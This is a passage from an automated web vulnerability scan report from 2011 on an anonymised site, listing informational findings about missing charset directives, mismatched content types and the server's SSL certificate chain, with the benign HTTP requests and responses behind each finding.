In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. https://www.x.com/dwr/interface  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /dwr/interface

Request

GET /dwr/interface HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 12 Aug 2011 13:53:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
Vary: User-Agent
JP: D=3397 t=1313157225958050
Connection: close


<html>
<head>
<title>The page can't be found (404)</title>

<style type="text/css">
body {
background-color: #e3e3e3;
color: #333;
font-family: Lucida Grande, Arial, Helvetica, sans-
...[SNIP]...

12.2. https://www.x.com/servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png

Request

GET /servlet/JiveServlet/previewBody/3566-102-2-3987/bg.png HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:29 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:50 GMT
Cache-Control: max-age=60
Content-Type: text/html
Content-Length: 196
JP: D=290 t=1313114370000022
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive

<html><head><title>Jive SBS</title></head>
<body><font face="arial,helvetica,sans-serif">
<b>Error</b><br><font size="-1">
The requested document could not be loaded.
</font></font></body></html>

13. Content type incorrectly stated  previous  next
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. https://www.x.com/dwr/interface/Clearvote.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /dwr/interface/Clearvote.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /dwr/interface/Clearvote.js HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/index.jspa
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:27 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:50:30 GMT
Cache-Control: max-age=60
Content-Type: text/plain
Content-Length: 810
JP: D=267 t=1313114368350872
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive


// Provide a default path to dwr.engine
if (dwr == null) var dwr = {};
if (dwr.engine == null) dwr.engine = {};
if (DWREngine == null) var DWREngine = dwr.engine;

if (Clearvote == null) var Clearvot
...[SNIP]...

13.2. https://www.x.com/opensearch.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /opensearch.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /opensearch.xml HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:07 GMT
Server: Apache-Coyote/1.1
Content-Type: application/opensearchdescription+xml;charset=UTF-8
Vary: User-Agent
JP: D=2678 t=1313157007976957
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/">
<ShortName>X Developer Network</ShortName>
<Description>Search X Developer Network</D
...[SNIP]...

13.3. https://www.x.com/view-video-short.jspa  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.x.com
Path:   /view-video-short.jspa

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /view-video-short.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 50
Vary: User-Agent
JP: D=5433 t=1313157226253277
Cache-Control: no-cache, private
Connection: close

There was an error loading that video information.

14. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.x.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Apr 12 18:00:00 GMT-06:00 2011
Valid to:  Tue May 07 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Fri Aug 12 09:27:09 GMT-06:00 2011.